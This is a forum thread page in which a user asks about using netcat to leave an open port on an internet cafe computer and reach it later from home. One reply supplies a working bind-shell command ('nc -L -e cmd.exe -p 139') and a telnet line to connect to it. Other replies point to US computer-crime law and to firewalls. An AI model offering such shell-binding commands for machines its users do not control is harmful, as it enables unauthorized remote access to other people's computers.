Page 2 of 2 FirstFirst 12

Thread: Opening ports

one of the best ways to prevent any anonymous and bad connects is to use remote control programs like NetOP or smth... it has very good authentication mechanism, control, etc
    for som\' **** from lithuania

There are laws against this (the installing Netcat for remote access to a machine you don't have permisison to do so on). Title 18 of US code, and many states have local laws, that would make this illegal under sections such as "unauthorized access or exceeding authorized access to a computer".

Either way, chances are proper firewall settings would block any non-authorized ports anyhow..

l00p

Sorry for all the dangling participles.

Originally posted here by ne0gen
    SO, theorethically, if I go to a inernet cafe, use on some computer netcat, open port 28973 for example, go home, use netcat to get remote access on the computer trough the opened port and its IP adress, I nedd no password and authorization(password etc) to get inside?(i dont want to do it, iam only interested in that).
    When Ive tried it remotely(trough netcat) on my friends computer(we both have dial-up and he KNOWS about it), it shows me cant grab xxx.xxx.xxx.xxx:139 with bind. Ive tried command
    nc -v -L -e cmd.exe -p 139 xxx.xxx.xxx.xxx
    and it showed: xxx.xxx.xxx.xxx: inverse host lookup failed: h_errno 11004: NO_DATA
    cant grab xxx.xxx.xxx.xxx:139 with bind.
    Can you help me? Where am I doing wrong?

Sorry, I had badly checked the quote. But you know what I am asking, so please help me.

Elite Hacker
    Originally posted here by ne0gen
    When Ive tried it remotely(trough netcat) on my friends computer(we both have dial-up and he KNOWS about it), it shows me cant grab xxx.xxx.xxx.xxx:139 with bind. Ive tried command
    nc -v -L -e cmd.exe -p 139 xxx.xxx.xxx.xxx
    and it showed: xxx.xxx.xxx.xxx: inverse host lookup failed: h_errno 11004: NO_DATA
    cant grab xxx.xxx.xxx.xxx:139 with bind.
    Can you help me? Where am I doing wrong?
    To open up the port you don't need the xxx.xxx.xxx.xxx you just need
    nc -v -L -e cmd.exe -p 139
    Then to connect you just use telnet:
    telnet xxx.xxx.xxx.xxx 139
    Hope that helps.

Originally posted here by h3r3tic
    To open up the port you don't need the xxx.xxx.xxx.xxx you just need
    nc -v -L -e cmd.exe -p 139
    Then to connect you just use telnet:
    telnet xxx.xxx.xxx.xxx 139
    Hope that helps.
    But in netcat readme is that I can open some ports on other computers remotely. Or i have bad understood. because english isnt my mother language.
    So it is possible or not? Must i have physical access?

and if I open some port like 23, can I then browse harddrive remotely? or i need authorization?

netcat must be running on the remote machine in order to open
    a port and grant access. Now there are some people out there who are clever
    enough to install it without physical access, but it is just the thing that its
    administrator will be trying to guard against.
    I came in to the world with nothing. I still have most of it.